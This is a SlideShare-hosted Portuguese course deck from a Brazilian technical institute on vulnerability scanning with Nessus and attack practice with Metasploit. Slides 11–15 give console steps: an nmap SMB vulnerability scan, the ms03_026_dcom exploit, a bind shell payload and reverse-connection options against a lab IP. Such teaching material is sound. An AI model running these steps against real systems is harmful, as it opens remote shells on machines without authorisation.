Nessus e Metaesploit - Prática de Ataques

1,926 views

Published on

Published in: Education
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,926
On SlideShare
0
From Embeds
0
Number of Embeds
109
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Nessus e Metaesploit - Prática de Ataques

  1. 1. Tecnologia em Redes de ComputadoresGerência de RedesPrática de Ataques – Nessus e MetaesploitProfessor: André Peresandre.peres@poa.ifrs.edu.brInstituto Federal do Rio Grande do Sul - IFRSPorto Alegre
  2. 2. NessusO Nessus é uma ferramenta para scan de vulnerabilidades em hostsPara utilizar:1. faça o download do nessushttp://www.tenable.com/products/nessus/nessus-download-agreement2. instale o pacoteCrie usuário, baixe base,...3. acesse através dehttps://ip_nessus:8834
  3. 3. NessusÉ possível criar uma política de scan, ou utilizar uma pré-definida...Na política se define, entre outras coisas, os plugins a serem utilizados nos testes...
  4. 4. Nessus Após a criação da política, se cria o scan, contendo:- nome (descrição do scan)- tipo (agendamento)- política a ser aplicada- lista de alvos→ launch scan...
  5. 5. Nessus Após o scan, é gerado um relatório contendo as vulnerabilidades encontradas e:- classificação- descrição- possível correção
  6. 6. NessusExemplo de vulnerabilidade:
  7. 7. NessusO Nessus gera um relatório completo com todas as vulnerabilidades encontradas (testadas de acordo com sua base de dados)Para que se verifique se a vulnerabilidade pode ser explorada → metaesploit
  8. 8. MetaEsploitO MetaEsploit é um conjunto de exploits capazes de realizar testes de vulnerabilidades através da sua exploração.Foi desenvolvido para pen-tests... porém pode ser utilizado por usuários maliciosos
  9. 9. MetaEsploitInstalação:1. download do pacote (http://metasploit.com/)2. instalação...3. executar o console: ….../bin/msfconsoleOu3. executar interface gráfica: …../bin/msfgui
  10. 10. MetaEsploitAlguns comandos do console:Mostra todos os exploits disponíveis:msf > show exploitsProcurando por um exploit específico (ex: smb)msf > search smbMostra todos os payloads disponíveis:msf > show payloads
  11. 11. MetaEsploitRealizando um ataque:1. Identificação de vulnerabilidade em alvo (ex: nessus)ou... executando uma varredura no alvo com nmap no console do metasploit:msf > nmap -sT -A --script=smb-check-vulns -P0 192.168.0.159 script que testa para vulnerabilidade no SMB (ex: windows 2000 server, XP com SP2)
  12. 12. MetaEsploitScripts no NMAP...- detecção de hosts- detecção de vulnerabilidades-……http://nmap.org/presentations/BHDC10/http://nmap.org/nsedoc/
  13. 13. MetaEsploitRealizando um ataque:2. selecionar o exploit a ser utilizado (search?)msf > use exploit/windows/dcerpc/ms03_026_dcom3. selecionar o payload (código a ser executado)msf > set payload windows/shell/bind_tcp
  14. 14. MetaEsploitRealizando um ataque:2. selecionar o alvomsf > set RHOST 192.168.0.1593. executar o exploitmsf > exploit
  15. 15. MetaEsploitRealizando um ataque:Adicionalmente (após o “use”):show payloads → payloads compatíveis com exploitshow targets → versões de SO afetadas pelo exploitset target → versão do SO alvoset LHOST → ip local (em caso de ataque com conexão reversa)set LPORT → porta local (conexão reversa)show options → opções selecionadas para o exploit

×